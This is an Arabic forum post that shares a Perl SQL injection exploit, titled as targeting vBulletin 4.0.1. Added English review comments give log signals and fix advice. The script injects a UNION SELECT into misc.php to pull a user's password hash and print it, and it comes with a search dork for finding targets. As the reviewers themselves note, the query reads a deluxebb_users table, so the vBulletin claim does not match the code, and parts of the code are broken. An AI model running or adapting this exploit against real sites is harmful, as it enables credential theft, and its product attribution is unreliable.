
dahapp 09-05-2010 01:55 AM

vBulletin™ Version 4.0.1 Remote SQL Injection Exploit
 
السلام عليكم و رحمة الله
الثغرة الجديدة اللي طلعت بإصدارات الفيبيلتن vBulletin
قلت أضعها لا تفوتكم


الكود
#!/usr/bin/perl

# Proof-of-concept listing as posted in the forum thread. It sends a single
# HTTP GET whose name parameter carries a UNION SELECT, then scans the
# response for a 32-character token and prints it as the password.
#
# NOTE(review): the banner and thread title say vBulletin 4.0.1, but the query
# built below reads from a table named deluxebb_users and targets misc.php
# with sub=profile. The product/version claim does not match the payload and
# should be treated as unverified when triaging reports that cite this post.
#
# NOTE(review): the listing is reproduced byte-for-byte as published; it has
# not been validated as runnable code.

use io::socket;

print q{
################################################## #####################
# vbulletin™ version 4.0.1 remote sql injection exploit #
# by indoushka #
# http://www.vbspiders.com/vb #
# #
# WinK hackerz (W@HAHERZ.ZZ) #
# dork: Powered by vbulletin™ version 4.0.1 #
################################################## #####################
};

# Prints the usage text when the third positional argument is missing.
# There is no exit in this branch, so execution continues afterwards.
if (!$argv[2]) {
print q{
usage: Perl vb4.0.1.pl host /directory/ victim_userid

perl vb4.0.1.pl www.vb.com /forum/ 1

};

}

# Positional arguments: host, forum directory, target user id.
# myuser, mypass and myid are assigned here but never referenced again
# anywhere in this listing.
$server = $argv[0];
$dir = $argv[1];
$user = $argv[2];
$myuser = $argv[3];
$mypass = $argv[4];
$myid = $argv[5];

print "------------------------------------------------------------------------------------------------\r\n";
print "[>] server: $server\r\n";
print "[>] dir: $dir\r\n";
print "[>] userid: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";

# Intended to strip a leading scheme from the host argument.
$server =~ s/(http://)//eg;

# Defender view: the injected value is concatenated straight into the request
# path. In access logs this appears as a GET for misc.php with sub=profile and
# a name value containing a quote, a closing parenthesis and union+select.
# The server-side fix is a parameterized query (or strict escaping) for that
# parameter; a WAF or log rule on union+select in query strings is a stopgap
# and a detection signal, not a fix.
$path = $dir;
$path .= "misc.php?sub=profile&name=0')+union+select+0,pass ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ,0+from%20deluxebb_users%20where%20(uid= '".$user ;

print "[~] prepare to connect...\r\n";

# Plain TCP to port 80 (no TLS). The request below carries only Host, Accept
# and Connection headers: no Cookie and no User-Agent, so it is unauthenticated
# and the missing User-Agent is itself a usable log filter.
$socket = io::socket::inet->new( proto => "tcp", peeraddr => "$server", peerport => "80") || die "[-] connection failed";

print "[+] connected\r\n";
print "[~] sending query...\r\n";
print $socket "get $path http/1.1\r\n";
print $socket "host: $server\r\n";
print $socket "accept: */*\r\n";
print $socket "connection: Close\r\n\r\n";
print "[+] done!\r\n\r\n";

print "--[ report ]------------------------------------------------------------------------------------\r\n";
# Response handling: reads the reply line by line; on the first line that
# matches the 32-character pattern it prints the capture (unless it compares
# equal to 0) and then exits.
# NOTE(review): 32 characters is the length of a hex MD5 digest, so this
# presumably expects an unsalted MD5 password hash to be reflected in the page
# output - confirm against the affected schema. Salted, slow password hashing
# limits what a leak of this column yields.
while ($answer = <$socket>)
{

if ($answer =~/(w{32})/)
{

{

if ($1 ne 0) {
print "password is: ".$1."\r\n";
print "--------------------------------------------------------------------------------------\r\n";

}
exit();
}

}
print "------------------------------------------------------------------------------------------------\r\n";

تحيآتى
غ ـمزة هآكرز

